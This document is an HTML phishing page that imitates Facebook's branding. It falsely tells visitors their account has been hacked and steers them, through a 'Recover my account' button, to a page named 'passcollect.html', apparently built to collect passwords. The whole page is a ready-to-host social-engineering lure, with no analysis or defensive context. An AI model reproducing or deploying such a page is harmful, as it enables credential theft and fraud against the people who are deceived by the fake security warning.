<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Error!</title>

<link rel="icon" type="image/gif/png" href="https://upload.wikimedia.org/wikipedia/commons/thumb/c/cd/Facebook_logo_%28square%29.png/600px-Facebook_logo_%28square%29.png">

<link href='http://fonts.googleapis.com/css?family=Roboto' rel='stylesheet' type='text/css'>
</head>
<body>
<style type="text/css">

.header{
background-color: #3B5998;
padding: 20px 10px;
}
.header p2{

color: white;
font-family: 'Roboto', sans-serif;
font-size: 38px;
font-weight:bold;

}



body{
background-color: #DADDE1;
font-family: 'Roboto', sans-serif;
font-size: 30px;
color: #4B4f56;   
}

.button {
    background-color: #3B5998;
    border: none;
    color: white;
    padding: 30px 150px;
    text-align: center;
    font-size: 45px;
    margin:auto;
    display:block;
    cursor: pointer;
    box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
    border-radius: 13px;
    width:100%;
}


.button:hover {
    background-color: #3e6ab7;
    box-shadow: 0 12px 16px 0 rgba(0,0,0,0.24), 0 17px 50px 0 rgba(0,0,0,0.19);
}


.link{
color: #5C73A3;
}

  </style>
<div class="header">
<center><p2 style="font-size:9vw;">facebook</p2></center>

</div>

<h3 style="font-size:5vw;">Facebook have found that your account is hacked by someone.</h3>

<p>Sorry for the trouble. We the facebook team is now working hard to get back your account<br>
You can now recover your account by confirming your identity.</p><br>

<form method="get" action="passcollect.html"><button type="submit"class="button">Recover my account</button>
</form><br>


<a href="skip.html" class="link">No I don't want my account</a><br><br><br><br><br>

</body>

</html>